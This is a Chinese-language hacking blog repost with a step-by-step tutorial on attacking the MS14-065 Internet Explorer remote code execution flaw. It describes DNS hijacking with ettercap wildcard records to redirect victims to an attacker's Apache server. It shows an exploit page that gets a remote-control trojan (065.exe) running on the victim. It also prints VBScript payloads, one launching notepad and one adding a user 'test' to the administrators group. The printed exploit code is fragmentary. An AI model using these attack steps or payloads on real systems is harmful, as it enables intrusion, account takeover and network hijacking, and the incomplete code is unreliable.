记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

ms14-065(IE浏览器远程代码执行漏洞)

2017-02-03 06:10

我们有专门录了一个视频

传送门:www.0-sec.org/ms14-065(IE浏览器远程代码执行漏洞).zip

 

 

我们本节说一下ms14-065 ie漏洞

https://technet.microsoft.com/library/security/ms14-065

微软的官方公告,可以看一下自己本机是不是有漏洞。
我本机刚好有所以就用本机进行演示了

可以看到现在电脑就一个administrator管理用户
我们现在用这个测试漏洞是否存在的exp用ie打开运行一下

可以看到自动添加了一个test用户证明漏洞确实存在
接着我们配置一个远控
这里我用它作为服务
http://192.168.0.103/065.exe
确定是可以访问的

这个就是html的exp了,接着我们打开kail用ettercap进行dns劫持

先配置一个apache把我们的exp配置好

接着开启apache

我们还需要配置一下ettcap的dns
etter.dns

#

* A 192.168.0.104
* A 192.168.0.104
* PTR 192.168.0.104 # Wildcards in PTR are not allowed

这里按照我这种格式设置,让它不管访问什么都会劫持到我们自己设置好的服务上
选择一下网卡-扫描host

这里add1添加我们的网关,add2添加我们攻击目标

选择好dns

接着我们就要开始dns劫持了

然后我们本机用ie访问任何一个网站

注意看现在远控是没有上线的

成功上线,攻击成功

本节就结束了
欢迎大家关注零组官方论坛:bbs.0-sec.org

 

 

测试代码:      //会自动打开windows的计算器和记事本

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function
</script>
<SCRIPT LANGUAGE="VBScript">
 

测试代码:         //添加用户并提升至管理员exp

<!DOCTYPE html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<head>
</head>
<body>
MS14-065,添加用户并提升到管理员,IE only
<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "net.exe","user test test /ad"
shell.ShellExecute "net.exe","localgroup administrators test /ad"
end function

</script>

<SCRIPT LANGUAGE="VBScript">
</script>

</body>
</html>

知识来源: www.0-sec.org/2017/02/02/ms14-065%ef%bc%88ie%e6%b5%8f%e8%a7%88%e5%99%a8%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%ef%bc%89/

阅读:168159 | 评论:0 | 标签:安全文章 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“ms14-065(IE浏览器远程代码执行漏洞)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词